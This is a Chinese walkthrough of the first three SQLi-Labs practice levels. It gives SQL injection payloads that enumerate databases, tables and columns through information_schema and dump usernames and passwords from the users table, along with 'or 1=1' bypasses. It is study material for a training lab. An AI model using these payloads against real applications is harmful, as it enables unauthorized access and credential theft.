SQLi_Labs

欢迎关注公众号：24h进德修业。没有拿不到的权限，只有不努力的白帽。

Less-1

尝试添加’注入，发现报错

这里我们就可以直接发现报错的地方，直接将后面注释，然后使用

1' order by 3%23

//得到列数为3

//这里用-1是为了查询一个不存在的id,好让第一句结果为空，直接显示第二句的结果

-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23

//得到数据库名

//得到表名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'security'%23

如下

//得到列名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 'users'%23

如下

//爆破得到数据

-1' union select 1,username,password from users where id=3%23

如下

Less-2

在添加’之后，得到返回

可以得到这个sql语句其实并没有单引号，只是用数字进行查询，例如

select * from users where id=1

所以我们也可以跟上面一样，payloads:

-1 or 1=1%23

如下

Less-3

添加’之后，返回

可以得到大概的sql语句:

select * from users where id=('input') LIMIT 0,1;

所以我们可以需要闭合)。

-1') or 1=1%23

如下

免责声明：本站提供的安全工具、程序、方法可能带有攻击性，仅供安全研究与教学之用，风险自负！本文部分内容来自网络，在此说明。
转载声明：著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

本文始发于微信公众号（24h进德修业）：SQLi_Labs